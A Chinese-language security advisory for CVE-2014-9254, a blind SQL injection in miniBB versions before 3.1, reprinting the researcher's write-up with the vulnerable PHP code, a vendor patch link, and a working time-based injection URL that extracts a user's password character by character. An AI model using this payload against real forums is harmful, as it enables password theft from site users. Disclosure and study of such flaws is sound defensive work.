miniBB “code” SQL注入漏洞

发布日期:2014-12-19
更新日期:2014-12-23

受影响系统:
MiniBB MiniBB < 3.1
描述:
CVE(CAN) ID: CVE-2014-9254

 MiniBB是独立的、开源的网络论坛构造程序。

MiniBB 3.1之前版本,当"action"设置为"unsubscribe"后,没有正确过滤bb_func_unsub.php的"code"参数值,攻击者通过注入任意SQL代码,利用此漏洞可操纵SQL查询。

<*来源:Kacper Szurek
 
  链接:http://secunia.com/advisories/61794/
 *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: miniBB 3.1 Blind SQL Injection
 # Date: 23-11-2014
 # Software Link: http://www.minibb.com/
 # Exploit Author: Kacper Szurek
 # Contact: http://twitter.com/KacperSzurek
 # Website: http://security.szurek.pl/
 # CVE: CVE-2014-9254
 # Category: webapps

 1. Description
   
 preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).

 File: bb_func_unsub.php
 $usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);

 $allowUnsub=FALSE;
 $chkCode=FALSE;

 if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
    //trying to unsubscribe directly from email
    $chkField='email_code';
    $chkVal=$_GET['code'];
    $userCondition=TRUE;
    $chkCode=TRUE;
 }
 else{
    //manual unsubsribe
    $chkField='user_id';
    $chkVal=$user_id;
    $userCondition=($usrid==$user_id);
 }

 if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))

http://security.szurek.pl/minibb-31-blind-sql-injection.html
   
 2. Proof of Concept

http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '

 This SQL will check if first password character user ID=1 is &#147;c&#148;.

 If yes, it will sleep 5 seconds.
   
 3. Solution:
   
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

建议:
厂商补丁:

MiniBB
 ------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:


MiniBB:
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

 Kacper Szurek:
http://security.szurek.pl/minibb-31-blind-sql-injection.html

相关推荐